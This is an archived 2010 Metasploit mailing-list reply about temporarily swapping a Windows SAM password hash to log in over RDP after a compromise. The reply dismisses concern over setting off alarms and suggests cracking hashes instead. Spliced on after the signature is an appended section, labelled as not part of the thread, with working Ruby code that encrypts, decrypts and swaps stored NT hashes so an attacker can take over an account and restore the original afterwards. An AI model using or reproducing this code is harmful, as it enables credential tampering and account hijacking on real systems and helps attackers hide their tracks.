Metasploit mailing list archives

Re: Simple script to swap hashes in SAM ..


From: Daniel Clemens <daniel.clemens () packetninjas net>
Date: Tue, 7 Sep 2010 12:15:56 -0500


On Sep 7, 2010, at 4:18 AM, John Nash wrote:

> Hello List,

> While trying some post exploitation, one of the major issues I guess is to log in to the system as a user over RDP.

Hrm.
A screenshot seems to be worth a thousand words. 

> We can do this in a couple of ways:

>   1. create a new user <--- will create alarms

Who really cares if it creates alarms.
Seriously, 99% of the time the response time will be nominal and no one will respond, so why worry about it?
If you have the ability to create accounts then it's most likely game over already and you've exploited what needs to be exploited to prove insecurity.

>   2. change the password of an existing user

> In case of (2) I was wondering whether it would be possible to just swap the existing hash with a new one (we know the password which hashes to this one) ... then do all we need to on the remote system ...
> then just replace the old hash for the original password back into the SAM.

Or crack the hashes so you know the password. 

> Is there any reason why this should not be possible? If yes, a Meterpreter script could do this job very easily ...

> Thoughts?

It seems like you're asking the wrong questions.
My rule of thumb with any assessment or engagement is to first assess if I am asking the wrong questions.
If I'm asking the wrong questions I'll always get the wrong answers.
Though this is a novel idea, I don't think it's that valuable in the long run.


| Daniel Uriah Clemens
| Packetninjas L.L.C | | http://www.packetninjas.net
| c. 205.567.6850      | | o. 866.267.8851 
"Moments of sorrow are moments of sobriety"
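The swap John describes has one concrete detail the thread leaves out: the V value in the SAM does not hold the raw 16-byte NT hash. On the Windows versions of that era it holds the hash DES-encrypted in two halves under keys derived from the account RID, then RC4-encrypted under a key derived from the hashed boot key, the scheme implemented by samdump2 and creddump. A script that swaps hashes therefore has to re-encrypt the known hash for that RID and boot key, and the safest way to restore is to write back the original ciphertext bytes verbatim. The following is an added example in Ruby (the language of Meterpreter scripts); it is not code from the thread or from the Metasploit project, and it works on an in-memory copy of the stored blob, not the live registry. The hashed boot key, RID and original hash are constructed sample values; the "known" hash is the NT hash of "password". Windows 10 1607 and later moved this storage to AES and are not covered.

```ruby
require 'openssl'
require 'digest'

# Added example (not from the thread). Models the pre-Windows-10 SAM "V" hash
# storage: each NT hash is DES-encrypted in two halves under keys derived from
# the account RID, then RC4-encrypted under a key derived from the hashed boot
# key, as implemented by samdump2/creddump.

NT_STRING = "NTPASSWORD\0".b

# DES keys carry odd parity in bit 0 of every byte.
def odd_parity_byte(b)
  (b & 0xFE) | ((b >> 1).to_s(2).count('1').even? ? 1 : 0)
end

# Spread 7 key bytes (56 bits) over 8 bytes of 7 bits each, then add parity.
def str_to_des_key(s)
  b = s.bytes
  k = [b[0] >> 1,
       ((b[0] & 0x01) << 6) | (b[1] >> 2),
       ((b[1] & 0x03) << 5) | (b[2] >> 3),
       ((b[2] & 0x07) << 4) | (b[3] >> 4),
       ((b[3] & 0x0F) << 3) | (b[4] >> 5),
       ((b[4] & 0x1F) << 2) | (b[5] >> 6),
       ((b[5] & 0x3F) << 1) | (b[6] >> 7),
       b[6] & 0x7F]
  k.map { |x| odd_parity_byte(x << 1) }.pack('C*')
end

# Two DES keys from the little-endian RID bytes r0..r3:
# key1 from r0r1r2r3r0r1r2, key2 from r3r0r1r2r3r0r1.
def rid_to_des_keys(rid)
  r = [rid].pack('V').bytes
  s1 = (r + r[0, 3]).pack('C*')
  s2 = [r[3], r[0], r[1], r[2], r[3], r[0], r[1]].pack('C*')
  [str_to_des_key(s1), str_to_des_key(s2)]
end

# Single DES on one block via 3DES with K1 = K2 = K3 (EDE collapses to E),
# because OpenSSL 3 ships single DES only in its legacy provider.
def des_block(key8, block8, encrypt)
  c = OpenSSL::Cipher.new('des-ede3')
  encrypt ? c.encrypt : c.decrypt
  c.key = key8 * 3
  c.padding = 0
  c.update(block8) + c.final
end

# Plain RC4 keystream XOR; OpenSSL 3 also moved RC4 to the legacy provider.
def rc4(key, data)
  s = (0..255).to_a
  kb = key.bytes
  j = 0
  256.times do |i|
    j = (j + s[i] + kb[i % kb.size]) & 0xFF
    s[i], s[j] = s[j], s[i]
  end
  i = j = 0
  data.bytes.map do |byte|
    i = (i + 1) & 0xFF
    j = (j + s[i]) & 0xFF
    s[i], s[j] = s[j], s[i]
    byte ^ s[(s[i] + s[j]) & 0xFF]
  end.pack('C*')
end

# RC4 key = MD5(hashed boot key[0..15] || RID (LE) || "NTPASSWORD\0").
def rc4_key_for(hbootkey, rid)
  Digest::MD5.digest(hbootkey[0, 16] + [rid].pack('V') + NT_STRING)
end

# NT hash -> the 16 bytes that sit in the V structure (deterministic).
def encrypt_nt_hash(hbootkey, rid, nt_hash)
  k1, k2 = rid_to_des_keys(rid)
  obf = des_block(k1, nt_hash[0, 8], true) + des_block(k2, nt_hash[8, 8], true)
  rc4(rc4_key_for(hbootkey, rid), obf)
end

def decrypt_nt_hash(hbootkey, rid, stored)
  k1, k2 = rid_to_des_keys(rid)
  obf = rc4(rc4_key_for(hbootkey, rid), stored)
  des_block(k1, obf[0, 8], false) + des_block(k2, obf[8, 8], false)
end

# The swap the thread proposes, against an in-memory copy of the stored blob:
# keep the original ciphertext verbatim, write the known hash in its encrypted
# form, and later put the saved bytes back.
def swap_and_restore(hbootkey, rid, stored, known_nt_hash)
  saved = stored.dup
  { during: encrypt_nt_hash(hbootkey, rid, known_nt_hash), restored: saved }
end

# Constructed sample inputs; KNOWN_NT is the NT hash of "password".
SAMPLE_HBOOTKEY = (0..15).map { |i| i * 17 }.pack('C*')
SAMPLE_RID      = 1000
ORIGINAL_NT     = ['0123456789abcdeffedcba9876543210'].pack('H*')
KNOWN_NT        = ['8846f7eaee8fb117ad06bdd830b7586c'].pack('H*')

if __FILE__ == $PROGRAM_NAME
  stored = encrypt_nt_hash(SAMPLE_HBOOTKEY, SAMPLE_RID, ORIGINAL_NT)
  r = swap_and_restore(SAMPLE_HBOOTKEY, SAMPLE_RID, stored, KNOWN_NT)
  puts "stored blob: #{stored.unpack1('H*')}"
  puts "during swap: #{decrypt_nt_hash(SAMPLE_HBOOTKEY, SAMPLE_RID, r[:during]).unpack1('H*')}"
  puts "restored:    #{decrypt_nt_hash(SAMPLE_HBOOTKEY, SAMPLE_RID, r[:restored]).unpack1('H*')}"
end
```

Because both layers are deterministic for a given RID and boot key, re-encrypting the original hash yields the same bytes as the saved blob, but saving the ciphertext avoids depending on having recovered the boot key correctly. The same hash stored under a different RID encrypts to different bytes, which is why a swap cannot simply copy another account's V bytes.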

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
